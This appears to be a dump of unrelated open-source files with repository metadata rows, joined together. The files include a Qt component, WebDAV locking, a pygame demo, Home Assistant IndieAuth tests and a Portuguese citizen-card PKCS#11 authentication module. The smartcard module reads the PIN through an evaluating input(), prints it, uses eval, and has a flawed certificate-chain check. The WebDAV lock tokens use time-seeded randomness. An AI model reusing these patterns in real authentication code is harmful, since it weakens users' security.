admin.site.register(models.ServerError, ServerErrorAdmin)
| mit | -779,838,395,596,206,200 | 37.691824 | 121 | 0.603544 | false |
jjhelmus/artview | artview/components/component_control.py | 1 | 7105 | """
component_control.py
Class instance for control variables shared between components.
"""
# Load the needed packages
from functools import partial
from ..core import Variable, Component, QtGui, QtCore, common, componentsList
class LinkPlugins(Component):
'''
Class instance for control variables shared between components.
The user may select two components from a list. A radio menu is
added for every common sharable variable. Each variable may be unlinked
from similar instance in the other component.
This is a powerful Component, multiple instances may conflict.
'''
@classmethod
def guiStart(self, parent=None):
kwargs, independent = \
common._SimplePluginStart("LinkPlugins").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, components=None, name="LinkPlugins", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
components : list of :py:class:`~artview.core.core.Component` instance
Components to control. If None will use the global list present in
artview.core.core.componentsList
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(LinkPlugins, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if components is None:
self.components = componentsList
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentAppended"),
self._updateComponentList)
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentRemoved"),
self._updateComponentList)
else:
self.components = components
self.comp0 = None
self.comp1 = None
self.setupUi()
self.show()
def _setVariables(self):
'''Determine common variables to both components.'''
self.variables = []
for var in self.comp0.sharedVariables.keys():
if var in self.comp1.sharedVariables.keys():
self.variables.append(var)
########################
# Button methods #
########################
def setupUi(self):
'''Build main layout.'''
if len(self.components) == 0:
return
if self.comp0 not in self.components:
self.comp0 = self.components[0]
if self.comp1 not in self.components:
self.comp1 = self.components[0]
# Select Components buttons
self.combo0 = QtGui.QComboBox()
self.combo0.activated[int].connect(self._comp0Action)
self.combo1 = QtGui.QComboBox()
self.combo1.activated[int].connect(self._comp1Action)
self.layout.addWidget(self.combo0, 0, 0)
self.layout.addWidget(self.combo1, 1, 0)
# Fill buttons
for component in self.components:
self.combo0.addItem(component.name)
self.combo1.addItem(component.name)
self.combo0.setCurrentIndex(self.components.index(self.comp0))
self.combo1.setCurrentIndex(self.components.index(self.comp1))
self._setVariables()
self._setRadioButtons()
def _setRadioButtons(self):
'''Add radio buttons for control over the variables.'''
# Radio Buttons
self.radioLayout = QtGui.QGridLayout()
self.layout.addLayout(self.radioLayout, 2, 0)
self.radioLayout.addWidget(QtGui.QLabel("Link"), 0, 1)
self.radioLayout.addWidget(QtGui.QLabel("Unlink"), 0, 2)
self.radioBoxes = []
for idx, var in enumerate(self.variables):
self._addRadioButton(var, idx)
def _addRadioButton(self, var, idx):
'''Add radio button for variable in the given index.'''
radioBox = QtGui.QButtonGroup()
self.radioBoxes.append(radioBox) # avoid garbage collector
link = QtGui.QRadioButton()
unlink = QtGui.QRadioButton()
QtCore.QObject.connect(link, QtCore.SIGNAL("clicked()"),
partial(self.connectVar, var))
QtCore.QObject.connect(unlink, QtCore.SIGNAL("clicked()"),
partial(self.disconnectVar, var))
radioBox.addButton(link)
radioBox.addButton(unlink)
if getattr(self.comp0, var) is getattr(self.comp1, var):
link.setChecked(True)
else:
unlink.setChecked(True)
if self.comp0 is self.comp1:
unlink.setDisabled(True)
self.radioLayout.addWidget(QtGui.QLabel(var[1::]), idx+1, 0)
self.radioLayout.addWidget(link, idx+1, 1)
self.radioLayout.addWidget(unlink, idx+1, 2)
def _comp0Action(self, idx):
'''Update Component 0.'''
self.comp0 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def _comp1Action(self, idx):
'''Update Component 1.'''
self.comp1 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def connectVar(self, var):
'''Assign variable in component 0 to component 1.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = comp0.var
setattr(self.comp1, var, getattr(self.comp0, var))
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("connect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def disconnectVar(self, var):
'''Turn variable in component 1 independente of component 0.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = Variable()
setattr(self.comp1, var, Variable())
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("disconnect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def _clearLayout(self, layout):
'''Recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self._clearLayout(item.layout())
def _updateComponentList(self, item):
'''Rebuild main layout.'''
self._clearLayout(self.layout)
self.setupUi()
| bsd-3-clause | -6,517,890,652,482,973,000 | 34.348259 | 78 | 0.611119 | false |
apple/llvm-project | lldb/third_party/Python/module/unittest2/unittest2/test/test_new_tests.py | 15 | 1677 | from cStringIO import StringIO
import unittest
import unittest2
from unittest2.test.support import resultFactory
class TestUnittest(unittest2.TestCase):
def assertIsSubclass(self, actual, klass):
self.assertTrue(issubclass(actual, klass), "Not a subclass.")
def testInheritance(self):
self.assertIsSubclass(unittest2.TestCase, unittest.TestCase)
self.assertIsSubclass(unittest2.TestResult, unittest.TestResult)
self.assertIsSubclass(unittest2.TestSuite, unittest.TestSuite)
self.assertIsSubclass(
unittest2.TextTestRunner,
unittest.TextTestRunner)
self.assertIsSubclass(unittest2.TestLoader, unittest.TestLoader)
self.assertIsSubclass(unittest2.TextTestResult, unittest.TestResult)
def test_new_runner_old_case(self):
runner = unittest2.TextTestRunner(resultclass=resultFactory,
stream=StringIO())
class Test(unittest.TestCase):
def testOne(self):
pass
suite = unittest2.TestSuite((Test('testOne'),))
result = runner.run(suite)
self.assertEqual(result.testsRun, 1)
self.assertEqual(len(result.errors), 0)
def test_old_runner_new_case(self):
runner = unittest.TextTestRunner(stream=StringIO())
class Test(unittest2.TestCase):
def testOne(self):
self.assertDictEqual({}, {})
suite = unittest.TestSuite((Test('testOne'),))
result = runner.run(suite)
self.assertEqual(result.testsRun, 1)
self.assertEqual(len(result.errors), 0)
if __name__ == '__main__':
unittest2.main()
| apache-2.0 | -8,616,042,802,471,574,000 | 31.25 | 76 | 0.65653 | false |
cern-it-sdc-id/davix | test/pywebdav/lib/locks.py | 4 | 8255 | import os
import sys
import time
import socket
import string
import posixpath
import base64
import urlparse
import urllib
import random
import logging
log = logging.getLogger(__name__)
import xml.dom
from xml.dom import minidom
from utils import rfc1123_date, IfParser, tokenFinder
from string import atoi,split
from errors import *
tokens_to_lock = {}
uris_to_token = {}
class LockManager:
""" Implements the locking backend and serves as MixIn for DAVRequestHandler """
def _init_locks(self):
return tokens_to_lock, uris_to_token
def _l_isLocked(self, uri):
tokens, uris = self._init_locks()
return uris.has_key(uri)
def _l_hasLock(self, token):
tokens, uris = self._init_locks()
return tokens.has_key(token)
def _l_getLockForUri(self, uri):
tokens, uris = self._init_locks()
return uris.get(uri, None)
def _l_getLock(self, token):
tokens, uris = self._init_locks()
return tokens.get(token, None)
def _l_delLock(self, token):
tokens, uris = self._init_locks()
if tokens.has_key(token):
del uris[tokens[token].uri]
del tokens[token]
def _l_setLock(self, lock):
tokens, uris = self._init_locks()
tokens[lock.token] = lock
uris[lock.uri] = lock
def _lock_unlock_parse(self, body):
doc = minidom.parseString(body)
data = {}
info = doc.getElementsByTagNameNS('DAV:', 'lockinfo')[0]
data['lockscope'] = info.getElementsByTagNameNS('DAV:', 'lockscope')[0]\
.firstChild.localName
data['locktype'] = info.getElementsByTagNameNS('DAV:', 'locktype')[0]\
.firstChild.localName
data['lockowner'] = info.getElementsByTagNameNS('DAV:', 'owner')
return data
def _lock_unlock_create(self, uri, creator, depth, data):
lock = LockItem(uri, creator, **data)
iscollection = uri[-1] == '/' # very dumb collection check
result = ''
if depth == 'infinity' and iscollection:
# locking of children/collections not yet supported
pass
if not self._l_isLocked(uri):
self._l_setLock(lock)
# because we do not handle children we leave result empty
return lock.token, result
def do_UNLOCK(self):
""" Unlocks given resource """
dc = self.IFACE_CLASS
if self._config.DAV.getboolean('verbose') is True:
log.info('UNLOCKing resource %s' % self.headers)
uri = urlparse.urljoin(self.get_baseuri(dc), self.path)
uri = urllib.unquote(uri)
# check lock token - must contain a dash
if not self.headers.get('Lock-Token', '').find('-')>0:
return self.send_status(400)
token = tokenFinder(self.headers.get('Lock-Token'))
if self._l_isLocked(uri):
self._l_delLock(token)
self.send_body(None, '204', 'Ok', 'Ok')
def do_LOCK(self):
""" Locking is implemented via in-memory caches. No data is written to disk. """
dc = self.IFACE_CLASS
log.info('LOCKing resource %s' % self.headers)
body = None
if self.headers.has_key('Content-Length'):
l = self.headers['Content-Length']
body = self.rfile.read(atoi(l))
depth = self.headers.get('Depth', 'infinity')
uri = urlparse.urljoin(self.get_baseuri(dc), self.path)
uri = urllib.unquote(uri)
log.info('do_LOCK: uri = %s' % uri)
ifheader = self.headers.get('If')
alreadylocked = self._l_isLocked(uri)
log.info('do_LOCK: alreadylocked = %s' % alreadylocked)
if body and alreadylocked:
# Full LOCK request but resource already locked
self.responses[423] = ('Locked', 'Already locked')
return self.send_status(423)
elif body and not ifheader:
# LOCK with XML information
data = self._lock_unlock_parse(body)
token, result = self._lock_unlock_create(uri, 'unknown', depth, data)
if result:
self.send_body(result, '207', 'Error', 'Error',
'text/xml; charset="utf-8"')
else:
lock = self._l_getLock(token)
self.send_body(lock.asXML(), '200', 'OK', 'OK',
'text/xml; charset="utf-8"',
{'Lock-Token' : '<opaquelocktoken:%s>' % token})
else:
# refresh request - refresh lock timeout
taglist = IfParser(ifheader)
found = 0
for tag in taglist:
for listitem in tag.list:
token = tokenFinder(listitem)
if token and self._l_hasLock(token):
lock = self._l_getLock(token)
timeout = self.headers.get('Timeout', 'Infinite')
lock.setTimeout(timeout) # automatically refreshes
found = 1
self.send_body(lock.asXML(),
'200', 'OK', 'OK', 'text/xml; encoding="utf-8"')
break
if found:
break
# we didn't find any of the tokens mentioned - means
# that table was cleared or another error
if not found:
self.send_status(412) # precondition failed
class LockItem:
""" Lock with support for exclusive write locks. Some code taken from
webdav.LockItem from the Zope project. """
def __init__(self, uri, creator, lockowner, depth=0, timeout='Infinite',
locktype='write', lockscope='exclusive', token=None, **kw):
self.uri = uri
self.creator = creator
self.owner = lockowner
self.depth = depth
self.timeout = timeout
self.locktype = locktype
self.lockscope = lockscope
self.token = token and token or self.generateToken()
self.modified = time.time()
def getModifiedTime(self):
return self.modified
def refresh(self):
self.modified = time.time()
def isValid(self):
now = time.time()
modified = self.modified
timeout = self.timeout
return (modified + timeout) > now
def generateToken(self):
_randGen = random.Random(time.time())
return '%s-%s-00105A989226:%.03f' % \
(_randGen.random(),_randGen.random(),time.time())
def getTimeoutString(self):
t = str(self.timeout)
if t[-1] == 'L': t = t[:-1]
return 'Second-%s' % t
def setTimeout(self, timeout):
self.timeout = timeout
self.modified = time.time()
def asXML(self, namespace='d', discover=False):
owner_str = ''
if isinstance(self.owner, str):
owner_str = self.owner
elif isinstance(self.owner, xml.dom.minicompat.NodeList):
owner_str = "".join([node.toxml() for node in self.owner[0].childNodes])
token = self.token
base = ('<%(ns)s:activelock>\n'
' <%(ns)s:locktype><%(ns)s:%(locktype)s/></%(ns)s:locktype>\n'
' <%(ns)s:lockscope><%(ns)s:%(lockscope)s/></%(ns)s:lockscope>\n'
' <%(ns)s:depth>%(depth)s</%(ns)s:depth>\n'
' <%(ns)s:owner>%(owner)s</%(ns)s:owner>\n'
' <%(ns)s:timeout>%(timeout)s</%(ns)s:timeout>\n'
' <%(ns)s:locktoken>\n'
' <%(ns)s:href>opaquelocktoken:%(locktoken)s</%(ns)s:href>\n'
' </%(ns)s:locktoken>\n'
' </%(ns)s:activelock>\n'
) % {
'ns': namespace,
'locktype': self.locktype,
'lockscope': self.lockscope,
'depth': self.depth,
'owner': owner_str,
'timeout': self.getTimeoutString(),
'locktoken': token,
}
if discover is True:
return base
s = """<?xml version="1.0" encoding="utf-8" ?>
<d:prop xmlns:d="DAV:">
<d:lockdiscovery>
%s
</d:lockdiscovery>
</d:prop>""" % base
return s
| lgpl-2.1 | -6,220,525,025,926,709,000 | 31.372549 | 89 | 0.544155 | false |
gmittal/aar-nlp-research-2016 | src/pygame-pygame-6625feb3fc7f/examples/chimp.py | 32 | 5876 | #!/usr/bin/env python
"""
This simple example is used for the line-by-line tutorial
that comes with pygame. It is based on a 'popular' web banner.
Note there are comments here, but for the full explanation,
follow along in the tutorial.
"""
#Import Modules
import os, pygame
from pygame.locals import *
from pygame.compat import geterror
if not pygame.font: print ('Warning, fonts disabled')
if not pygame.mixer: print ('Warning, sound disabled')
main_dir = os.path.split(os.path.abspath(__file__))[0]
data_dir = os.path.join(main_dir, 'data')
#functions to create our resources
def load_image(name, colorkey=None):
fullname = os.path.join(data_dir, name)
try:
image = pygame.image.load(fullname)
except pygame.error:
print ('Cannot load image:', fullname)
raise SystemExit(str(geterror()))
image = image.convert()
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, RLEACCEL)
return image, image.get_rect()
def load_sound(name):
class NoneSound:
def play(self): pass
if not pygame.mixer or not pygame.mixer.get_init():
return NoneSound()
fullname = os.path.join(data_dir, name)
try:
sound = pygame.mixer.Sound(fullname)
except pygame.error:
print ('Cannot load sound: %s' % fullname)
raise SystemExit(str(geterror()))
return sound
#classes for our game objects
class Fist(pygame.sprite.Sprite):
"""moves a clenched fist on the screen, following the mouse"""
def __init__(self):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image, self.rect = load_image('fist.bmp', -1)
self.punching = 0
def update(self):
"move the fist based on the mouse position"
pos = pygame.mouse.get_pos()
self.rect.midtop = pos
if self.punching:
self.rect.move_ip(5, 10)
def punch(self, target):
"returns true if the fist collides with the target"
if not self.punching:
self.punching = 1
hitbox = self.rect.inflate(-5, -5)
return hitbox.colliderect(target.rect)
def unpunch(self):
"called to pull the fist back"
self.punching = 0
class Chimp(pygame.sprite.Sprite):
"""moves a monkey critter across the screen. it can spin the
monkey when it is punched."""
def __init__(self):
pygame.sprite.Sprite.__init__(self) #call Sprite intializer
self.image, self.rect = load_image('chimp.bmp', -1)
screen = pygame.display.get_surface()
self.area = screen.get_rect()
self.rect.topleft = 10, 10
self.move = 9
self.dizzy = 0
def update(self):
"walk or spin, depending on the monkeys state"
if self.dizzy:
self._spin()
else:
self._walk()
def _walk(self):
"move the monkey across the screen, and turn at the ends"
newpos = self.rect.move((self.move, 0))
if self.rect.left < self.area.left or \
self.rect.right > self.area.right:
self.move = -self.move
newpos = self.rect.move((self.move, 0))
self.image = pygame.transform.flip(self.image, 1, 0)
self.rect = newpos
def _spin(self):
"spin the monkey image"
center = self.rect.center
self.dizzy = self.dizzy + 12
if self.dizzy >= 360:
self.dizzy = 0
self.image = self.original
else:
rotate = pygame.transform.rotate
self.image = rotate(self.original, self.dizzy)
self.rect = self.image.get_rect(center=center)
def punched(self):
"this will cause the monkey to start spinning"
if not self.dizzy:
self.dizzy = 1
self.original = self.image
def main():
"""this function is called when the program starts.
it initializes everything it needs, then runs in
a loop until the function returns."""
#Initialize Everything
pygame.init()
screen = pygame.display.set_mode((468, 60))
pygame.display.set_caption('Monkey Fever')
pygame.mouse.set_visible(0)
#Create The Backgound
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((250, 250, 250))
#Put Text On The Background, Centered
if pygame.font:
font = pygame.font.Font(None, 36)
text = font.render("Pummel The Chimp, And Win $$$", 1, (10, 10, 10))
textpos = text.get_rect(centerx=background.get_width()/2)
background.blit(text, textpos)
#Display The Background
screen.blit(background, (0, 0))
pygame.display.flip()
#Prepare Game Objects
clock = pygame.time.Clock()
whiff_sound = load_sound('whiff.wav')
punch_sound = load_sound('punch.wav')
chimp = Chimp()
fist = Fist()
allsprites = pygame.sprite.RenderPlain((fist, chimp))
#Main Loop
going = True
while going:
clock.tick(60)
#Handle Input Events
for event in pygame.event.get():
if event.type == QUIT:
going = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
going = False
elif event.type == MOUSEBUTTONDOWN:
if fist.punch(chimp):
punch_sound.play() #punch
chimp.punched()
else:
whiff_sound.play() #miss
elif event.type == MOUSEBUTTONUP:
fist.unpunch()
allsprites.update()
#Draw Everything
screen.blit(background, (0, 0))
allsprites.draw(screen)
pygame.display.flip()
pygame.quit()
#Game Over
#this calls the 'main' function when this script is executed
if __name__ == '__main__':
main()
| mit | -7,890,414,618,805,825,000 | 29.28866 | 76 | 0.604152 | false |
kennedyshead/home-assistant | tests/components/auth/test_indieauth.py | 8 | 6005 | """Tests for the client validator."""
import asyncio
from unittest.mock import patch
import pytest
from homeassistant.components.auth import indieauth
from tests.test_util.aiohttp import AiohttpClientMocker
@pytest.fixture
def mock_session():
"""Mock aiohttp.ClientSession."""
mocker = AiohttpClientMocker()
with patch(
"aiohttp.ClientSession",
side_effect=lambda *args, **kwargs: mocker.create_session(
asyncio.get_event_loop()
),
):
yield mocker
def test_client_id_scheme():
"""Test we enforce valid scheme."""
assert indieauth._parse_client_id("http://ex.com/")
assert indieauth._parse_client_id("https://ex.com/")
with pytest.raises(ValueError):
indieauth._parse_client_id("ftp://ex.com")
def test_client_id_path():
"""Test we enforce valid path."""
assert indieauth._parse_client_id("http://ex.com").path == "/"
assert indieauth._parse_client_id("http://ex.com/hello").path == "/hello"
assert (
indieauth._parse_client_id("http://ex.com/hello/.world").path == "/hello/.world"
)
assert (
indieauth._parse_client_id("http://ex.com/hello./.world").path
== "/hello./.world"
)
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/.")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/hello/./yo")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/hello/../yo")
def test_client_id_fragment():
"""Test we enforce valid fragment."""
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/#yoo")
def test_client_id_user_pass():
"""Test we enforce valid username/password."""
with pytest.raises(ValueError):
indieauth._parse_client_id("http://[email protected]/")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://user:[email protected]/")
def test_client_id_hostname():
"""Test we enforce valid hostname."""
assert indieauth._parse_client_id("http://www.home-assistant.io/")
assert indieauth._parse_client_id("http://[::1]")
assert indieauth._parse_client_id("http://127.0.0.1")
assert indieauth._parse_client_id("http://10.0.0.0")
assert indieauth._parse_client_id("http://10.255.255.255")
assert indieauth._parse_client_id("http://172.16.0.0")
assert indieauth._parse_client_id("http://172.31.255.255")
assert indieauth._parse_client_id("http://192.168.0.0")
assert indieauth._parse_client_id("http://192.168.255.255")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://255.255.255.255/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://11.0.0.0/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://172.32.0.0/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://192.167.0.0/")
def test_parse_url_lowercase_host():
"""Test we update empty paths."""
assert indieauth._parse_url("http://ex.com/hello").path == "/hello"
assert indieauth._parse_url("http://EX.COM/hello").hostname == "ex.com"
parts = indieauth._parse_url("http://EX.COM:123/HELLO")
assert parts.netloc == "ex.com:123"
assert parts.path == "/HELLO"
def test_parse_url_path():
"""Test we update empty paths."""
assert indieauth._parse_url("http://ex.com").path == "/"
async def test_verify_redirect_uri():
"""Test that we verify redirect uri correctly."""
assert await indieauth.verify_redirect_uri(
None, "http://ex.com", "http://ex.com/callback"
)
with patch.object(indieauth, "fetch_redirect_uris", return_value=[]):
# Different domain
assert not await indieauth.verify_redirect_uri(
None, "http://ex.com", "http://different.com/callback"
)
# Different scheme
assert not await indieauth.verify_redirect_uri(
None, "http://ex.com", "https://ex.com/callback"
)
# Different subdomain
assert not await indieauth.verify_redirect_uri(
None, "https://sub1.ex.com", "https://sub2.ex.com/callback"
)
async def test_find_link_tag(hass, mock_session):
"""Test finding link tag."""
mock_session.get(
"http://127.0.0.1:8000",
text="""
<!doctype html>
<html>
<head>
<link rel="redirect_uri" href="hass://oauth2_redirect">
<link rel="other_value" href="hass://oauth2_redirect">
<link rel="redirect_uri" href="/beer">
</head>
...
</html>
""",
)
redirect_uris = await indieauth.fetch_redirect_uris(hass, "http://127.0.0.1:8000")
assert redirect_uris == ["hass://oauth2_redirect", "http://127.0.0.1:8000/beer"]
async def test_find_link_tag_max_size(hass, mock_session):
"""Test finding link tag."""
text = "".join(
[
'<link rel="redirect_uri" href="/wine">',
("0" * 1024 * 10),
'<link rel="redirect_uri" href="/beer">',
]
)
mock_session.get("http://127.0.0.1:8000", text=text)
redirect_uris = await indieauth.fetch_redirect_uris(hass, "http://127.0.0.1:8000")
assert redirect_uris == ["http://127.0.0.1:8000/wine"]
@pytest.mark.parametrize(
"client_id",
["https://home-assistant.io/android", "https://home-assistant.io/iOS"],
)
async def test_verify_redirect_uri_android_ios(client_id):
"""Test that we verify redirect uri correctly for Android/iOS."""
with patch.object(indieauth, "fetch_redirect_uris", return_value=[]):
assert await indieauth.verify_redirect_uri(
None, client_id, "homeassistant://auth-callback"
)
assert not await indieauth.verify_redirect_uri(
None, client_id, "homeassistant://something-else"
)
assert not await indieauth.verify_redirect_uri(
None, "https://incorrect.com", "homeassistant://auth-callback"
)
| apache-2.0 | -2,260,595,293,303,195,400 | 31.459459 | 88 | 0.627977 | false |
joelpinheiro/safebox-smartcard-auth | ccModule.py | 1 | 10386 | # Portuguese Citizen Card Module for SafeBox
# author: Miguel Vicente
#
# reference:
# www.bit4id.org/trac/pykcs11
import PyKCS11
import getopt
import sys
import platform
import pytz
from datetime import datetime
from pytz import timezone
from M2Crypto import X509
import OpenSSL
import re
import requests
class ccHandler(object):
def __init__(self):
self.pkcs11 = PyKCS11.PyKCS11Lib()
self.pkcs11.load("libpteidpkcs11.so")
self.slots = self.pkcs11.getSlotList()
self.session = None
self.attrDict = None
self.key = None
self.signature = None
self.e = None
self.m = None
self.ex = None
self.mx = None
def getSlotInfo(self,slot):
print "Slot n.:",slot
print self.pkcs11.getSlotInfo(slot)
def getTokenInfo(self,slot):
print self.pkcs11.getTokenInfo(slot)
def getMechanismInfo(self,slot):
print "Mechanism list:"
m = self.pkcs11.getMechanismList(slot)
for x in m:
i = self.pkcs11.getMechanismInfo(slot,x)
if not i.flags & PyKCS11.CFK_DIGEST:
if i.ulMinKeySize != PyKCS11.CK_UNAVAILABLE_INFORMATION:
print "ulMinKeySize:"+i.ulMinKeySize
if i.ulMaxKeySize != PyKCS11.CK_UNAVAILABLE_INFORMATION:
print "ulMaxKeySize"+i.ulMaxKeySize
def getInfo(self):
print self.pkcs11.getInfo()
def getSessionInfo(self,slot,pin=""):
session = self.pkcs11.openSession(slot)
if pin != "":
if pin == None:
print "(using pinpad)"
else:
print "(using pin: %s)" % pin
session.login(pin)
else:
print
if pin:
session.logout()
def openSession(self):
for s in self.slots:
try:
self.session = self.pkcs11.openSession(s)
print "Opened session 0x%08X" % self.session.session.value()
pin = input("Your smartcard pin is required: ")
try:
self.session.login(pin=str(pin))
self.loadDict() #ler objecto rsa
break
except:
print "login failed, exception:", str(sys.exc_info()[1])
except PyKCS11.PyKCS11Error, e:
print "Error:", e
def loadDict(self):
objects = self.session.findObjects()
all_attributes = PyKCS11.CKA.keys()
# remove the CKR_ATTRIBUTE_SENSITIVE attributes since we can't get
# their values and will get an exception instead
all_attributes.remove(PyKCS11.CKA_PRIVATE_EXPONENT)
all_attributes.remove(PyKCS11.CKA_PRIME_1)
all_attributes.remove(PyKCS11.CKA_PRIME_2)
all_attributes.remove(PyKCS11.CKA_EXPONENT_1)
all_attributes.remove(PyKCS11.CKA_EXPONENT_2)
all_attributes.remove(PyKCS11.CKA_COEFFICIENT)
# only use the integer values and not the strings like 'CKM_RSA_PKCS'
all_attributes = [e for e in all_attributes if isinstance(e, int)]
for o in objects:
attributes = self.session.getAttributeValue(o, all_attributes)
attrDict = dict(zip(all_attributes, attributes))
if attrDict[PyKCS11.CKA_CLASS] == PyKCS11.CKO_PRIVATE_KEY \
and attrDict[PyKCS11.CKA_KEY_TYPE] == PyKCS11.CKK_RSA:
self.key = o;
self.attrDict = attrDict;
break
def sign(self):
#assinar challenge do servidor com a chave privada
try:
toSign = "12345678901234567890" #TODO Challenge do servidor
self.signature = self.session.sign(self.key,toSign)
print "Signature:"
print self.signature
print dump(''.join(map(chr, self.signature)), 16)
except:
print "Sign failed, exception:", str(sys.exc_info()[1])
def verify(self):
self.m = self.attrDict[PyKCS11.CKA_MODULUS]
self.e = self.attrDict[PyKCS11.CKA_PUBLIC_EXPONENT]
s = ''.join(chr(c) for c in self.signature).encode('hex')
self.mx = eval('0x%s' % ''.join(chr(c) for c in self.m).encode('hex'))
self.ex = eval('0x%s' % ''.join(chr(self.e) for self.e in self.e).encode('hex'))
print "self.mx" + str(self.mx)
print "self.ex" + str(self.ex)
sx = eval('0x%s' % s)
decrypted = pow(sx,self.ex,self.mx)
d = hexx(decrypted).decode('hex')
print "Decrypted:"
print dump(d, 16)
def certificates(self):
"""
Get certificates
"""
objects = self.session.findObjects()
try:
certificates = []
for obj in objects:
d = obj.to_dict()
if d['CKA_CLASS'] == 'CKO_CERTIFICATE':
der = self._os2str(d['CKA_VALUE'])
cert = X509.load_cert_string(der, X509.FORMAT_DER)
certificates.append(cert)
return certificates
except:
return 'Error: Getting User Certificate'
def _os2str(self, os):
"""
Convert octet string to python string
"""
return ''.join(chr(c) for c in os)
def bi(self):
BIprefix = "serialNumber=BI"
certificates = self.certificates()
cert0 = certificates[0].as_text()
"""
Subtring to find BI in certificate
"""
p = cert0.find(BIprefix);
s = p + len(BIprefix)
bi = cert0[s:s+8]
return bi
#print "BI:" + bi
def certificate_chain_verify(self):
"""Verify if certificate chain is valid"""
certificates = self.certificates()
verified_chain = False
"""
Tasks:
-Validate date
-Verify pubkey signatures
-Validate crl
"""
for i in range (0,4):
certificate = certificates[i]
public_key = certificates[i+1].get_pubkey()
task1 = self.validateCertificateDate(self.get_certificate_validity(certificate))
task2 = self.verify_certificate(certificate, public_key)
task3 = self.validate_crls(certificate)
if task1 and task2 and task3:
verified_chain = True
print verified_chain
return verified_chain
def validateCertificateDate(self,dates):
present = datetime.now(pytz.utc)
if present > dates[0] and present < dates[1]:
return True
else:
return False
def validate_crls(self,certificate):
"""
Validate CRL and CRL delta
"""
revcrl = self.revoked_certifications(self.get_crluri(), certificate)
revcrldelta = self.revoked_certifications(self.get_crldeltauri(),certificate)
if revcrl or revcrldelta:
return False
else:
return True
def revoked_certifications(self, crlString,certificate):
objects = self.session.findObjects()
revoked = False
uri = ''
path = re.search(crlString, certificate.as_text())
if path:
uri = path.groups()[0]
print uri
"""
Find CRL's URI
"""
#p = path.group().find(URIprefix);
#s = p + len(URIprefix)
#uri = path.group()[s:]
#print "uri:" + uri
# Gets content from CRL URI
if path!=None:
crl = requests.request('GET',uri)
crl_object = OpenSSL.crypto.load_crl(OpenSSL.crypto.FILETYPE_ASN1, crl.content)
revoked_objects = crl_object.get_revoked()
if revoked_objects != None:
for rvk in revoked_objects:
print rvk.get_serial()
certSerial = certificate.get_serial_number()
if certSerial == rvk.get_serial():
revoked = True
#print self.get_certificate_serial(certificate)
#print (certSerial,rvk.get_serial())
#if rvk.get_serial() == certSerial:
# revoked = True
"""
TODO:
Apanhar a serial do proprietario do CC e
verificar se nenhum destes revoked objects tem
essa serial. Se tiver revoked = true.
"""
return revoked
#except:
# return 'Error: Getting User Certificate'
#return revoked
def verify_certificate(self, certificate, public_key):
result = certificate.verify(public_key)
if result:
return True
else:
return False
def get_certificate_validity(self,certificate):
return (self.get_certificate_date_notBefore(certificate),self.get_certificate_date_notAfter(certificate))
def get_certificate_pKey(self, certificate):
return certificate.get_pubkey()
def get_certificate_pKey_text(self, certificate_object):
return certificate_object.get_pubkey().get_rsa().as_pem()
def get_certificate_date_notBefore(self, certificate_object):
return certificate_object.get_not_before().get_datetime()
def get_certificate_date_notAfter(self, certificate_object):
return certificate_object.get_not_after().get_datetime()
def get_certificate_subject_commonName(self, certificate_object):
return certificate_object.get_subject().commonName
def get_certificate_issuer_commonName(self, certificate_object):
return certificate_object.get_issuer().commonName
def get_crluri(self):
return r'X509v3 CRL Distribution Points:\s+Full Name:\s+URI:([^\s]+)'
def get_crldeltauri(self):
return r'X509v3 Freshest CRL:\s+Full Name:\s+URI:([^\s]+)'
def dump(src, length=8):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
return result
def hexx(intval):
x = hex(intval)[2:]
if (x[-1:].upper() == 'L'):
x = x[:-1]
if len(x) % 2 != 0:
return "0%s" % x
return x
| gpl-2.0 | -8,252,353,066,543,728,000 | 31.055556 | 113 | 0.566821 | false |
veroc/Bika-LIMS | bika/lims/exportimport/instruments/alere/pima/beads.py | 4 | 2900 | """ Alere Pima "Beads"
"""
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from . import AlerePimaImporter, AlerePimaSLKParser
import json
import traceback
title = "Alere Pima Beads"
def Import(context, request):
""" Alere Pima Beads analysis results
"""
infile = request.form['alere_pima_beads_file']
fileformat = request.form['alere_pima_beads_format']
